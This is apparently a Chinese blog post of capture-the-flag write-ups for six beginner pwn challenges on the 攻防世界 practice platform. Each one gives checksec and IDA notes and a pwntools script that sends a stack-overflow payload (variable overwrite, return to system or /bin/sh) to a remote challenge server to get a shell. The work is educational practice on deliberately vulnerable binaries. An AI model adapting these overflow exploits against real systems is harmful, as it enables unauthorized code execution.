攻防世界 pwn

阅读数: 次 2021-02-02

字数统计: 798字 | 阅读时长: 3分

1.get_shell
2.when_did_you_born
3.hello_pwn
4.level0
5.level2
6.cgpwn2

1.get_shell

nc连接题
连接后ls | cat flag 在这里插入图片描述

2.when_did_you_born

file checksec
有canary保护，不能栈溢出
在这里插入图片描述
ida64
先输入v5,v5不能等于1926。再输入v4，注意有gets函数，不限制输入，但无法溢出，点进去v4,v5

发现var_18是v5，var_20是v4，那么可以输入v4时将v5的值覆盖为1926，就可以cat flag了

脚本

#!/usr/bin/env python3
from pwn import*
context(os="linux",arch="amd64",log_level="debug")

zdb=remote("220.249.52.133",38796)

payload=b'a'*(0x20-0x18)+p64(1926)

zdb.sendlineafter("What's Your Birth?\n","2002")
zdb.sendlineafter("What's Your Name?\n",payload)
zdb.interactive()

3.hello_pwn

file checksec 无canary保护，可以栈溢出
在这里插入图片描述
ida64

点进去sub_400686函数，发现是system(cat flag)
点进去unk_601068
下面的dword_60106c就是if中的条件。而read可输入10ull，可以将dword_60106c覆盖

#!/usr/bin/env python3
from pwn import*
context(os="linux",arch="amd64",log_level="debug")

zdb=remote("111.200.241.243",34376)

payload=b'a'*(0x60106C-0x601068)+p64(1853186401)   
#注意此处a*（高地址-低地址），
#在栈中ida将高地址写在上面（地址用上往下是从高到低），
#而在汇编文本中高地址写在下面（从低到高）。
#之所以如此是因为栈的sp指针在栈顶，每输一个数据，sp减少，向下移，数据填充在高地址，这样就和汇编文本认知相符了

zdb.sendlineafter("lets get helloworld for bof\n",payload)
zdb.interactive()

4.level0

file checksec
在这里插入图片描述
ida64
注意vuln()或者vulnerable()函数一般是ida认为有漏洞的函数
vulnerable：易受攻击的

在这里插入图片描述
可以栈溢出
callsystem函数可以得到shell

脚本

#!/usr/bin/env python3
from pwn import*
context(os="linux",arch="amd64",log_level="debug")
zdb=remote("node3.buuoj.cn",27190)
payload=b'a'*(0x80-0x00+8)+p64(0x40059A)
zdb.sendlineafter("Hello, World\n",payload)
zdb.interactive()

5.level2

file checksec
在这里插入图片描述
ida32
buf可以溢出

打开字符串窗口看看有没有/bin/sh

在这里插入图片描述

#!/usr/bin/env python3

from pwn import*

context(os="linux",log_level="debug")

zdb=remote("111.200.241.243",48130)

#payload=b'a'*(0x88-0x00+4)+p32(0x804845C)+p32(0x0804A024)  
#text段中callsystem
#payload=b'a'*(0x88-0x00+4)+p32(0x804849E)+p32(0x0804A024)  
# text段中callsystem
payload=b'a'*(0x88-0x00+4)+p32(0x08048320)+b'aaaa'+p32(0x0804A024) 
#plt段中system
#以上三种payload都可以，extern段中不能用，其中plt段中多加了4个a
#在pwn中，一般我们调用plt表中gets函数，传递两个参数，第一个是返回地址，第二个是要写入字符串的地址(可能与此类似，加的4个a为system返回地址)
#payload=b'a'*(0x88-0x00+4)+p32(0x0804A038)+p32(0x0804A024) 
#extern段中system

zdb.sendlineafter("Input:\n",payload)

zdb.interactive()

6.cgpwn2

file checksec
在这里插入图片描述
ida32
可以输入一个name，长度为50，还可以输入一个s，有溢出漏洞

pwn函数中有system函数

地址为0x8055A

查看字符串窗口没有/bin/sh,但我们可以在name处输入一个/bin/sh，溢出调用system时把原来的echo hehehe覆盖掉，得到shell
name处地址
在这里插入图片描述

脚本

#!/usr/bin/env python3

from pwn import*

context(os="linux", log_level="debug")
#zdb = process("./cgpwn2")
zdb=remote("220.249.52.133",41107)

payload = b'a' * (0x26 - 0x00 + 4)
payload = payload + p32(0x804855A) + p32(0x804A080)

zdb.recvuntil("please tell me your name")
zdb.sendline("/bin/sh")
zdb.recvuntil("hello,you can leave some message here:\n")
zdb.sendline(payload)
zdb.interactive()

-------------本文结束感谢您的阅读-------------